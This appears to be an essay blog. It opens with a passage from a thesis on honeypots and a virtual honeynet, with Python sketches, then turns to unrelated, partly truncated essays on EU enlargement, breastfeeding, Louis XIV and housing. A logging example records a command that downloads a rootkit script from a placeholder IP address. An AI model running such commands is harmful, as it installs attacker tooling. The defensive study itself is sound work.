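        log.append((datetime.now(timezone.utc).isoformat(), addr[0]))
        conn.close()

srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
srv.bind(("127.0.0.1", 0))       # let the OS pick a free port
port = srv.getsockname()[1]
log, stop = [], threading.Event()
t = threading.Thread(target=honeypot_listener, args=(srv, log, stop))
t.start()

socket.create_connection(("127.0.0.1", port)).close()  # simulated probe
for _ in range(100):             # wait briefly for the probe to be logged
    if log:
        break
    time.sleep(0.05)
stop.set(); t.join(); srv.close()
```

A production deployment would of course emulate service banners and forward events off-host, but even this skeleton captures the defining property: zero false positives, because nothing legitimate ever connects.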
They are usually implemented as low-interaction honeypots, but the implementation may vary depending on the available funding and the expertise required by the organization. Production honeypots can be placed within the application and authentication server subnets, where they can identify any attacks directed towards those subnets. Thus they can be used to identify both internal and external threats for an organization. They can also detect malware propagation in the network caused by zero-day exploits. Since IDS detection is based on database signatures, an IDS fails to detect exploits that are not defined in its database; this is where honeypots outshine intrusion detection systems. They aid system and network administrators by providing network situational awareness. On the basis of these results, administrators can take the decisions necessary to add or enhance the security resources of the organization, e.g. firewall, IDS, IPS, etc.

2.2.2.2 Research Honeypots

Research honeypots are deployed by network security researchers, the whitehat hackers. Their primary goal is to learn the tools, tactics and techniques of the blackhat hackers with which they exploit computer and network systems. These honeypots are deployed with the idea of allowing the attacker complete freedom, and in the process learning his tactics from his movement within the system. Research honeypots help security researchers isolate the tools attackers use to exploit systems. These tools are then carefully studied within a sandbox environment to identify zero-day exploits. Worms, trojans and viruses propagating in the network can also be isolated and studied. The researchers then document their findings and share them with system programmers, network and system administrators, and various system and anti-virus vendors, providing the raw material for the rule engines of IDS, IPS and firewall systems. Research honeypots act as early warning systems.
They are designed to detect and log the maximum information from attackers while being stealthy enough not to let attackers identify them. The identity of the honeypot is crucial, and we can conclude that the learning curve (from the attacker) is directly proportional to the stealthiness of the honeypot. These honeypots are usually deployed at universities and by the R&D departments of various organizations, typically as high-interaction honeypots.

2.3 Honeynet

The concept of the honeypot is sometimes extended to a network of honeypots, known as a honeynet. In a honeynet we group different types of honeypots with different operating systems, which increases the probability of trapping an attacker. At the same time, a setting in which the attacker explores the honeynet through network connections between the various host systems provides additional prospects for monitoring the attack and reveals information about the intruder. The honeynet operator can also use the honeynet for training purposes, gaining valuable experience with attack strategies and digital forensics without endangering production systems.

The Honeynet Project is a non-profit research organization that provides tools for building and managing honeynets. The tools of the Honeynet Project are designed for the latest generation of high-interaction honeynets, which require two separate networks. The honeypots reside on the first network, and the second network holds the tools for managing the honeynet. Between these tools (and facing the Internet) is a device known as the honeywall. The honeywall, which is actually a kind of gateway device, captures, controls, and analyzes all inbound and outbound traffic to the honeypots [4].

A honeynet is a high-interaction honeypot designed to capture a wide range of information on threats.
High-interaction means that a honeynet provides real systems, applications, and services for attackers to interact with, as opposed to low-interaction honeypots, which provide emulated services and operating systems. It is through this extensive interaction that we gain information on threats, both external and internal to an organization. What makes a honeynet different from most honeypots is that it is a network of real computers for attackers to interact with. These victim systems (honeypots within the honeynet) can be any type of system, service, or information you want to provide [14].

2.4 Honeynet Data Management

Data management consists of three processes: data control, data capture and data collection.

2.4.1 Data Control

Data control is the containment of activity within the honeynet. It determines the means through which the attacker's activity can be restricted so as to avoid damaging or abusing other systems and resources through the honeynet. This demands a great deal of planning, as we need to give the attacker freedom in order to learn from his moves, and at the same time not let our resources (honeypot plus bandwidth) be used to attack, damage and abuse other hosts on the same or different subnets. Careful measures are taken by the administrators of the honeynet to study and formulate a policy on attacker freedom versus containment, and to implement it in a way that achieves maximum data control while not being discovered or identified by the attacker as a honeypot. Security is a process and is implemented in layers; various mechanisms to achieve data control are available, such as firewalls, counting outbound connections, intrusion detection systems, intrusion prevention systems and bandwidth restriction. Depending on our requirements and the risk thresholds defined, we can implement data control mechanisms accordingly [4].

2.4.2 Data Capture

Data capture involves the capturing, monitoring and logging of all threats and attacker activities within the honeynet.
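The kind of structured, off-host event logging that data capture calls for can be sketched as follows. This is an assumption-laden illustration: the function name, the event fields and the IP addresses (taken from the documentation ranges) are our own, and the `collector` list stands in for a remote collection point:

```python
import hashlib
import json
from datetime import datetime, timezone

def capture_event(activity: str, source_ip: str, collector: list) -> dict:
    """Record one attacker action as a structured, timestamped event.

    In a real honeynet the event would be shipped immediately to a
    remote collection point, so that a disk wipe on the honeypot
    cannot destroy it; here `collector` is a stand-in list. A digest
    of the payload lets the analyst detect later tampering.
    """
    event = {
        "timestamp": datetime.now(timezone.utc).isoformat(),
        "source_ip": source_ip,
        "activity": activity,
        "digest": hashlib.sha256(activity.encode()).hexdigest(),
    }
    collector.append(json.dumps(event))  # ship off-host right away
    return event

collector = []
capture_event("wget http://198.51.100.7/rootkit.sh", "203.0.113.9", collector)
capture_event("chmod +x rootkit.sh", "203.0.113.9", collector)
```

Tools such as Sebek implement the honeypot side of this idea far more stealthily, hooking read and write system calls in the kernel rather than logging in user space.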
Analysis of this captured data provides insight into the tools, tactics, techniques and motives of the attackers. The concept is to achieve maximum logging capability at all nodes and hence log any kind of attacker interaction without the attacker knowing it. This stealthy logging is achieved by setting up tools and mechanisms on the honeypots to log all system activity, and by having network logging capability at the honeywall. Every bit of information is crucial in studying the attacker, whether it is a TCP port scan, a remote or local exploit attempt, a brute-force attack, an attack tool downloaded by the hacker, the local commands run, any communication carried out over encrypted or unencrypted channels (mostly IRC), or any outbound connection attempt made by the attacker [25]. All of this should be logged successfully and sent to a remote location, to avoid loss of data due to the risk of system damage caused by attackers, such as data being wiped from disk. To prevent the attacker from detecting this kind of activity, data masking techniques such as encryption should be used.

2.4.3 Data Collection

Once data is captured, it is securely sent to a centralized collection point, where it is used for analysis and archiving. Data is collected from the different honeynet sensors. Implementations may vary depending on the requirements of the organization; however, the latest implementations incorporate data collection at the honeywall gateway [19].

2.5 Honeynet Architectures

There are three honeynet architectures, namely Generation I, Generation II and Generation III.

2.5.1 Generation I Architecture

The Gen I honeynet was developed in 1999 by the Honeynet Project. Its purpose was to capture attacker activity and give attackers the feeling of a real network. The architecture is simple, with a firewall aided by an IDS in front and honeypots placed behind it.
This makes it detectable by the attacker [7].

2.5.2 Generation II and III Architecture

Gen II honeynets were first introduced in 2001, and Gen III honeynets were released at the end of 2004. Gen II honeynets were designed to address the issues of Gen I honeynets. Gen II and Gen III honeynets have the same architecture; the only differences are improvements in deployment and management in Gen III honeynets, along with the addition of a Sebek server built into the honeywall. Sebek is a stealthy capture tool installed on honeypots that captures and logs all read and write system calls. This is very helpful in providing insight into the attacker [7]. A radical change in architecture was brought about by the introduction of a single device that handles the data control and data capture mechanisms of the honeynet, called the IDS gateway or, marketing-wise, the Honeywall. By making the architecture more stealthy, attackers are kept longer and thus more data is captured. There was also a major thrust in improving the honeypot layer of data capture with the introduction of new UNIX and Windows based data capture tools.

2.6 Virtual Honeynet

Virtualization is a technology that allows running multiple virtual machines on a single physical machine. Each virtual machine can be an independent operating system installation. This is achieved by sharing the physical machine's resources, such as CPU, memory, storage and peripherals, through specialized software across multiple environments. Thus multiple virtual operating systems can run concurrently on a single physical machine [4]. A virtual machine is specialized software that can run its own operating systems and applications as if it were a physical computer.
It has its own CPU, RAM, storage and peripherals, managed by software that dynamically shares the physical hardware resources. A virtual honeynet is a solution that lets one run a honeynet on a single computer. We use the term virtual because all the different operating systems placed in the honeynet appear to be running on their own, independent computers. Network traffic to a machine on the honeynet may indicate a compromised enterprise system.

Chapter 3: Design and Implementation

Computer networks connected to the Internet are vulnerable to a variety of exploits that can compromise their intended operations. Systems can be subject to denial of service attacks, i.e. attacks that prevent other computers from gaining access to a desired service (e.g. a web server) or prevent them from connecting to other computers on the Internet. They can also be subject to attacks that cause them to cease operations either temporarily or permanently. A hacker may be able to compromise a system and gain root access, as if he were the system administrator. The number of exploits targeted against various platforms, operating systems, and applications increases regularly, and most vulnerabilities and attack methods are detected only after exploitation, causing big losses.

The following are the main components of the physical deployment of the honeynet. First is the design of the deployed architecture. Then we installed Sun VirtualBox as the virtualization software, in which we virtually installed three operating systems: two work as honeypots, and one, Honeywall Roo 1.4, serves as the honeynet's transparent gateway. Snort and Sebek are part of the Honeywall Roo operating system: Snort as the IDS, Snort-Inline as the IPS, and Sebek as the data capture tool on the honeypots.

When the entire OS and honeywall functionality is installed on the system, it formats all previous data on the hard disk; the only purpose of the CD-ROM is to install this functionality to the local hard drive. The LiveCD itself cannot be modified, but after installing it on the hard drive we can modify it according to our requirements.
This approach helps us maintain the honeywall, allowing the honeynet to use automated tools such as yum to keep packages current [31]. The following table summarizes the products and features installed in the honeynet and the hardware requirements; the current versions of the installed products are also given.

Table 3.1: Project Summary

- Host Operating System: Windows Server 2003 R2; HW vendor HP Compaq DC 7700; Intel(R) Pentium D CPU 3 GHz; RAM 2 GB; storage 120 GB; NIC 1 GB Ethernet controller (public IP)
- Guest Operating System 1: Linux, Honeywall Roo 1.4; single-processor virtual machine (HONEYWALL); RAM 512 MB; storage 10 GB; NIC 1: 100 Mbps bridged interface; NIC 2: 100 Mbps host-only interface; NIC 3: 100 Mbps bridged interface (public IP)
- Guest Operating System 2: Linux, Ubuntu 8.04 LTS (Hardy Heron); single-processor virtual machine (HONEYPOT); RAM 256 MB; storage 10 GB; NIC: 100 Mbps host-only vmnet (public IP)
- Guest Operating System 3: Windows Server 2003; single-processor virtual machine (HONEYPOT); RAM 256 MB; storage 10 GB; NIC: 100 Mbps host-only vmnet (public IP)
- Virtualization software: Sun VirtualBox, version 3
- Architecture: Gen III, implemented as a virtual honeynet
- Honeywall: Roo 1.4
- IDS: Snort 2.6.x
- IPS: Snort_inline 2.6.1.5
- Data capture tool (on honeypots): Sebek 3.2.0
- Honeynet project online tenure: November 12, 2009 to December 12, 2009

3.1 Deployed Architecture and Design

3.2 Windows Server 2003 as Host OS

The usability and performance of virtualization software are very good on Windows Server 2003. Windows Server 2003 is a server operating system produced by Microsoft, considered by Microsoft to be the cornerstone of its Windows Server System line of business server products.
Windows Server 2003 is more scalable and delivers better performance than its predecessor, Windows 2000.

3.3 Ubuntu as Honeypot

Determined to use free and open source software for this project, Linux was the natural choice for our project's honeypot server. Ubuntu 8.04 was used as a Linux-based honeypot for our implementation. The concept was to set up an up-to-date Ubuntu server, configured with commonly used services such as SSH, FTP, Apache, MySQL and PHP, and study attacks directed towards them on the Internet. Ubuntu, being the most widely used Linux desktop, can prove to be a good platform to study zero-day exploits. It is also a candidate for malware collection and a source from which to learn about hacker tools being used on the Internet. Ubuntu was successfully deployed as a virtual machine and set up in our honeynet with a host-only virtual Ethernet connection. The honeypot was made sweeter, i.e., a more interesting target for the attacker, by setting up all services with default settings: for example, SSH allowed password-based connectivity from any IP on default port 22; users created were given privileges to install and run applications; the Apache index.html page was made remotely accessible with default errors and banners; the MySQL default port 3306 was accessible; and outbound connections were allowed but limited [3].

Ubuntu is a computer operating system based on the Debian GNU/Linux distribution. It is named after the Southern African ethical ideology Ubuntu ("humanity towards others") [5] and is distributed as free and open source software. Ubuntu provides an up-to-date, stable operating system for the average user, with a strong focus on usability and ease of installation. Ubuntu focuses on usability and security. The Ubiquity installer allows Ubuntu to be installed to the hard disk from within the Live CD environment, without the need to restart the computer prior to installation.
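The project's honeypots capture attacker activity with Sebek and full services. Purely as an illustration of the core honeypot idea, the self-contained Python sketch below (the `honeypot_listener` helper, port 2222, and the log format are our own assumptions, not part of the deployment) records connection attempts to a port that offers no real service; since the machine advertises nothing legitimate, every contact is suspicious by definition.

```python
import socket
import threading
import time
import datetime

def honeypot_listener(host, port, log, max_conns=1):
    """Accept TCP connections on (host, port) and record each attempt.

    A real honeypot exposes full services (SSH, Apache, MySQL, ...);
    this sketch only records who connected and when.
    """
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    srv.bind((host, port))
    srv.listen(5)
    for _ in range(max_conns):
        conn, addr = srv.accept()
        # Record timestamp, source IP, and source port, then close.
        log.append((datetime.datetime.now().isoformat(), addr[0], addr[1]))
        conn.close()
    srv.close()

if __name__ == "__main__":
    log = []
    t = threading.Thread(target=honeypot_listener,
                         args=("127.0.0.1", 2222, log))
    t.start()
    time.sleep(0.5)  # give the listener time to bind
    # Simulate an attacker probing the fake SSH-like port.
    probe = socket.create_connection(("127.0.0.1", 2222))
    probe.close()
    t.join()
    print(len(log))  # 1 connection attempt captured
```

A production honeypot would of course keep the connection open and emulate (or really run) the service, as the Ubuntu guest above does.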
Ubuntu also emphasizes accessibility and internationalization to reach as many people as possible [33]. Ubuntu comes installed with a wide range of software that includes OpenOffice, Firefox, Empathy (Pidgin in versions before 9.10), Transmission, GIMP, and several lightweight games (such as Sudoku and chess). Ubuntu allows networking ports to be closed using its firewall, with customized port selection.
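Whether a given honeypot port is actually reachable after configuring the firewall can be verified with a simple TCP connect test, the same check an attacker's port scanner performs. The sketch below is our own illustration; the `port_open` helper is hypothetical, not a tool used in this project.

```python
import socket

def port_open(host, port, timeout=1.0):
    """Return True if a TCP connection to host:port succeeds within
    the timeout, False if it is refused, filtered, or times out."""
    try:
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        return False

if __name__ == "__main__":
    # Demonstrate against a listener we control: bind an ephemeral port,
    # confirm it reads as open, then close it and confirm it reads closed.
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    print(port_open("127.0.0.1", port))  # True
    srv.close()
    print(port_open("127.0.0.1", port))  # False
```

Run against the honeypot's address, such a check confirms which of the advertised services (SSH on 22, HTTP on 80, and so on) the firewall's customized port selection really leaves exposed.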
Tuesday, June 4, 2019
Why Were Bulgaria and Romania Accepted in the EU?
Why were Bulgaria and Romania accepted into the EU in 2007 despite their incomplete democratisation, which was acknowledged by the European Commission?

Introduction

In January 2007 Romania and Bulgaria joined the European Union. They had not been able to join in the 2004 EU expansion, as they had failed to meet the EU's criteria for membership at the time. In 2007, however, there still existed serious doubts as to whether Romania or Bulgaria would be able to join. Although both were democracies, the two nations still had major political issues relating to corruption, government accountability and their incomplete democratisation process. Why then, if the EU acknowledged that both countries still had serious problems, were these nations accepted into the EU? This essay will look at the circumstances leading up to Bulgaria and Romania's entry into the EU, examine why many believed they were not ready for membership, and explore the reasons behind their acceptance by Brussels.

Background to Membership

In 2004 eight Eastern European countries were admitted into the EU. Both Bulgaria and Romania were turned down for full membership of the EU at this point, due to their being significantly behind the other eight nations in terms of GDP, democratisation and other factors [1]. However, both nations soon went from being candidates to being accession countries in April 2005, on the condition that both continued to make the necessary reforms, and in September 2006 it was confirmed that both would become full members in January 2007 [2]. In many ways, then, the final decision regarding Romanian and Bulgarian membership was not made in January 2007, but arguably as early as 2005, which then made it inevitable.
Throughout this period there were serious doubts about the Eastern European nations' ability and willingness to enact the necessary reforms, and even upon entry the EU acknowledged that there was still much work to be done.

Democratic Deficiencies

The 2004 Romanian election was said by many commentators to be proof that the country had not yet made the transition to fully fledged democracy. There were allegations of voter irregularities, missing votes and candidates with links to the former security apparatus of the country [3]. Both nations' political systems still had aspects of authoritarian regimes, and a year after membership both were still unable to fully guarantee their citizens' constitutional rights. Romania and Bulgaria's legal systems were considered by many to be incompatible with a free and democratic society [4]. In economic terms the two ex-communist nations were extremely poor, with a GDP around just 30% of the EU average. At the time of the accession process both markets had not yet completed the transition into free market economies, infrastructure was ageing and the state still had a large role in both nations' economies. The most significant problem, however, was the widespread corruption in the states, especially with regard to Bulgaria. The EU consistently complained about Bulgarian organised crime's links with high-level Bulgarian government officials, who have often been found siphoning EU grants meant for infrastructure to family businesses or to criminal gangs. Such is the level of corruption that the EU saw fit to withhold 486 million Euros' worth of aid in 2008 [5].

Reasons for Membership

Taking into account the serious problems, poverty, corruption and lack of accountability of Romania and Bulgaria, why did the EU allow them membership in January 2007? As we have already mentioned, the decision to accept Romania and Bulgaria as members was taken long before 2007.
Although they were rejected as full members in 2004, from their acceptance as accession countries in 2005 it was clear that they were on the path to full membership. The EU did place stringent conditions on full membership, which it is debatable whether the pair have achieved. The EU did judge in 2006 that both countries, although having a lot of work to do, had satisfied the criteria. Both Romania and Bulgaria had, since 2004, reformed their legislative systems, economies and political processes [6]. From this point on, although the EU could delay membership, it could not feasibly deny membership to the two unless there was some major breach of democratic and human rights norms.

Membership as a Means to Reform

Along with the legal arguments, Brussels clearly believed that to deny membership when the nations had clearly made profound transitional steps to reform would be not only unfair but damaging to the EU, Romania and Bulgaria. The EU believed that membership would act as a motivating factor for both nations to continue reforms, whereas rejection might well have convinced the elites of both nations to continue their corrupt and undemocratic practices.
The obvious financial and political benefits that come with membership have, as predicted by the EU, helped both nations start the economic reforms needed [7]. This essay believes that the reason Romania and Bulgaria were accepted was that the EU believed only membership would help the countries to successfully integrate into Europe, and that despite several problems regarding corruption and accountability, the EU was satisfied with both the existing reforms and the pledges that the two nations would continue to meet EU expectations and demands in future if they were allowed membership in 2007.

Bibliography
Bagehot, "Europe: Balkan Blushes: Bulgaria, Romania and the EU" (The Economist, London, July 26, 2008, Vol 388, Issue 8590)
Ciobanu, Monica, "Romania's travails with democracy and accession to the European Union" (Europe-Asia Studies, 59.8, pp. 1429-1450)
Pridham, Geoffrey, "The Scope and Limitations of Political Conditionality: Romania's Accession to the European Union" (Comparative European Politics, Houndsmills, Dec 2007, Vol 5, Issue 4, pp. 347-367)
Sangiovanni, Mette Eilstrup, Debates on European Integration (Palgrave Macmillan, New York, 2006)

Website
BBC News, "EU approves Bulgaria and Romania", 26/09/2006, accessed 10/12/2008, http://news.bbc.co.uk/1/hi/world/europe/5380024.stm

Footnotes
1. Sangiovanni, Mette Eilstrup, Debates on European Integration (Palgrave Macmillan, New York, 2006), p. 125
2. Pridham, Geoffrey, "The Scope and Limitations of Political Conditionality: Romania's Accession to the European Union" (Comparative European Politics, Houndsmills, Dec 2007, Vol 5, Issue 4, pp. 347-367)
3. Ciobanu, Monica, "Romania's travails with democracy and accession to the European Union" (Europe-Asia Studies, 59.8), p. 1444
4. Pridham, Geoffrey, "The Scope and Limitations of Political Conditionality: Romania's Accession to the European Union" (Comparative European Politics, Houndsmills, Dec 2007, Vol 5, Issue 4, pp. 347-367)
5. Bagehot, "Europe: Balkan Blushes: Bulgaria, Romania and the EU" (The Economist, London, July 26, 2008, Vol 388, Issue 8590)
6. Ciobanu, Monica, "Romania's travails with democracy and accession to the European Union" (Europe-Asia Studies, 59.8, pp. 1429-1450)
7. Bagehot, "Europe: Balkan Blushes: Bulgaria, Romania and the EU" (The Economist, London, July 26, 2008, Vol 388, Issue 8590)
Monday, June 3, 2019
The Benefits Of Breastfeeding
The Benefits Of Breastfeeding

Human milk is uniquely engineered for human infants, and is the biologically natural way to feed them. Breastfeeding, in comparison to feeding breast milk substitutes such as infant formula, has numerous health benefits. It benefits not only children and mothers but society and the economy as well.

Introduction

One of the most beneficial and natural steps a mother can take for her children is to breastfeed them. Science has proven remarkable health benefits of breast milk that are passed from mothers to their children. The benefits, from the building of antibodies to protect a newborn at birth to the special nutrients that prevent numerous infancy infections, are countless. No other single step taken by a mother can so drastically impact the present and future wellbeing of her newborn baby. Breast milk not only benefits the newborn baby; it also benefits the mother, society and the environment. In this paper the benefits of breastfeeding for both infants and mothers will be stated. Also, I will talk about its benefits to the environment and society. Finally, I will discuss what the United Arab Emirates does in terms of breastfeeding.

The benefits of breastfeeding for Infants

Nutritional benefits

Breast milk is a unique nutritional source that cannot adequately be replaced by any other food. It is ultimately the best source of nutrition for a new baby. Many components in breast milk help protect infants against infection and disease. It contains the perfect combination of proteins, fats, vitamins, and carbohydrates. The proteins in breast milk are more easily digested than those in formula or cow's milk. The calcium and iron in breast milk are also more easily absorbed. Breast milk also contains leukocytes, living cells found only in breast milk, which help fight infection.
It is the antibodies, living cells, enzymes, and hormones that make breast milk the perfect choice (Brown, 2008).

Immunological benefits

Most preemies are at risk of infections that can sometimes be very serious, so immune system benefits are some of the most important benefits breastfeeding a premature baby can provide. Human milk has the ability to protect them against infections and serious diseases, such as diarrhea and Haemophilus influenzae. Breastfed children experience a lower rate of severe diarrheal disease than children who are given formula milk. In a study conducted on a controlled group of infants (age bracket of less than 6 months), it was observed that breastfed newborns were noticeably protected against Haemophilus influenzae type B disease (Cochi, 1986). Evidence suggests that breast milk can carry particular or non-particular immunities to the newborn's respiratory tract, which is extremely important in the early days after birth when the immune system is not fully developed. Mother's milk protects newborn babies against respiratory problems like breathlessness, wheezing and other infections of the respiratory tract in the initial four months of their life. Children who are given formula milk experience increased risk of respiratory problems and severe otitis media, along with extended duration of middle ear infections, due to their immature immune system. Breast milk also plays a vital role in protecting infants from infection by the Herpes simplex virus II.
It was also confirmed that breastfed babies were less likely to die from SIDS (Sudden Infant Death Syndrome), the reason being the prevention of respiratory and gastrointestinal infections due to the strong immunity developed in them because of breast milk (Allen & Hector, 2005). To sum up, all these findings of different studies strongly indicate that mother's milk develops and enhances the immune system of newborn babies, especially in the very first years of their life.

Cognitive benefits

In addition to the nutritional and immunological benefits of breast milk, breastfeeding may help preemies develop intellectually. Breast milk is associated with increases in child cognitive ability and educational achievement. Cognitive development of social and psychomotor skills increases with the consumption and duration of breastfeeding. According to Horwood and Fergusson, such effects are relatively long lived, extending not only throughout childhood but also into young adulthood (1998). Children who consume human milk in the early days of their life have a significantly higher IQ at the ages of seven and eight than those who did not get their mother's milk (Erterm, 2001). In fact, studies suggest that nutrients present in breast milk may have a significant effect on neurologic development in premature and term infants. Breastfeeding is associated with a 3.16-point higher score for cognitive development compared with formula feeding after adjustment for significant covariates (Anderson et al., 1999).

Health Benefits to Moms Who Breastfeed

The babies are not the only ones who benefit from breastfeeding. Moms also benefit from breastfeeding their premature babies. Breastfeeding not only reduces the risk of breast cancer but also plays a role in preventing endometrial, ovarian and cervical cancers. It reduces the risk of anemia and protects against bone-related health issues such as osteoporosis and hip fractures later in life (Heacock, 1992).
It also greatly helps the mother's body return to its earlier shape faster, helps in losing the extra weight gained during pregnancy, and plays a very important role in the contraction of the uterus after delivery to control postpartum bleeding. The fat stores of the body are consumed to produce human milk, which can easily burn from five hundred to fifteen hundred calories every day. Breastfeeding also delays the return of fertility and thus leads to a natural gap between subsequent pregnancies. It also develops a special bonding and emotional relationship between the mother and the baby (Brown, 2008; Dimes Foundation, 2010).

Benefits to the environment and the Society

Breastfeeding also has economic advantages: it's cheaper than buying formula and helps avoid medical bills later, because it helps equip the baby to fight off disease and infection. According to UNICEF, financial benefits are associated with breastfeeding: higher breastfeeding initiation and duration rates would significantly improve the health of a nation, and since breastfed babies and their mothers are at lower risk of certain illnesses, there are potential cost savings for the wider health care system (2006). In fact, it reduces both direct costs such as clinical or hospital fees and indirect costs such as formula costs (Weimer, 2001). Breastfeeding is also linked to the environment. Breastfeeding the young decreases the use of raw materials, energy and other resources demanded in the manufacturing, packaging, distribution, promotion and waste disposal of formula milk, which ultimately reduces global pollution (Lance, 2007).

Breastfeeding in United Arab Emirates

Conclusion

It is concluded that not a single brand of formula milk can replace the properties and nutrients of breast milk; regardless of the addition of vitamins, supplements and minerals, it is and will essentially stay a chemical formulation.
Human milk has nutritional, immunological, and developmental benefits for the child, as well as physiological and emotional benefits for the mother. It also holds several benefits for the environment and society. The United Arab Emirates
Sunday, June 2, 2019
The Most Successful Absolute Monarch in Europe was Louis XIV of France
Of all the absolute rulers in Europe, by far the best example of one, and the most powerful, was Louis XIV of France. Although Louis had some failures, he also had many successes. He controlled France's money and had many different ways to get, as well as keep, his power, and he knew how to delegate jobs to smart but loyal people. According to the textbook, an absolute monarch is a king or queen who has unlimited power and seeks to control all aspects of society (McDougal Littell, 1045). In simpler terms, it is a ruler who can do just about anything without having to get permission from anyone, or having to worry about the repercussions. This was a trend that started in the 1600s among European leaders who were rich and didn't like to be told what to do. These conflicts arose with the Estates-General in France, or Parliament in England, which had substantial control. The first countries to have absolute rulers were the traditionally strong countries, such as England, Spain, and of course Louis XIV's France. In order to gain the power he desired as an absolute monarch, Louis used a few key techniques that were very successful. His first and most necessary step to get all control was to take away the nobles' power, so that they were completely under his control. He first did this by taking the nobles' positions of power and either filling them himself or giving the jobs to loyal middle-class men or to nobles who were completely loyal and under his control. Louis had very simple reasoning for doing this: if the nobles had any power or control, they would have a better chance of overthrowing him, and since there can only be so much total power, the more they had, the less ... ...s was from a military standpoint, which was rare for him. In 1667, Louis attacked a part of the Netherlands that was owned by the Spanish.
This resulted in the gaining of 12 towns, which encouraged Louis to attack the Dutch Netherlands, which did gain him a few wealthy port towns before ending in disaster. Louis' last great success was the building of the Palace of Versailles, which as described earlier was a feat never before matched by a ruler. Of all the absolute rulers in European history, Louis XIV of France was the most powerful, and the best example, because of his successes; his ability to continue his complete control even after failures; his ability to use France's money in any way he wanted, such as on the Palace of Versailles; his taking away the nobles' power; and his ability to delegate important jobs to smart yet loyal people.
Saturday, June 1, 2019
America Needs Affordable Housing Essay -- Exploratory Essays Research
America Needs Affordable Housing

It is often easy to label large cities or third world countries as failures in the field of affordable housing, yet the crisis, like an invisible cancer, manifests itself in many forms, plaguing both urban and suburban areas. Reformers have wrestled passionately with the issue for centuries, revealing the severity of the situation in an attempt for change, while politicians have only responded with band-aid solutions. Unfortunately, the housing crisis easily fades from our memory, replaced by visions of homeless vets or starving children. Metropolis magazine explains that though billions of dollars are spent each year on housing and development programs worldwide, "at least 1 billion people lack adequate housing; some 100 million have none at all." In an attempt to correct this worldwide dilemma, a United Nations conference, Habitat II, was held in Istanbul, Turkey in June of 1996. This conference was open not only to government leaders, but also to community organizers, non-governmental organizations, architects and planners. By the year 2000, half the world's people will live in cities. By the year 2025, two thirds of the world population will be urban dwellers: "Globally, one million people move from the countryside to the city each week." Martin Johnson, a community organizer and Princeton professor who attended Habitat II, definitively put into words the focus of the deliberations. Cities, which are currently plagued with several of the severe problems of dis-investment (crime, violence, lack of jobs and inequality) and, more importantly, a lack of affordable and decent housing, quickly appeared in the forefront of the agenda. The dis-investment is present in many large citie... ...ary 1997: 66+

Johnson, Martin, "United Nations Habitat II Conference in Istanbul, Turkey," The Advocate, December 1996: 2+

Outline
I. Introduction
A. International situation
1. Habitat II conference in Istanbul
a. Article written in Metropolis magazine
b. Personal account by community organizer
II. Body
A. Bergen County
1. HUD statistics for county
2. Studies shown in graphs, charts, tables
3. Maps showing minority, unemployed, and low income areas
a. This is to draw a possible conclusion, of course
b. Statistics show ownership housing problems
B. NYC situation
1. Less statistics, more stories and examples
a. Drawing from NYT article 8-part series
III. Conclusion(s)
A. Are there relationships of race and housing?
B. Is the government pulling its weight?
C. Are there solutions at hand?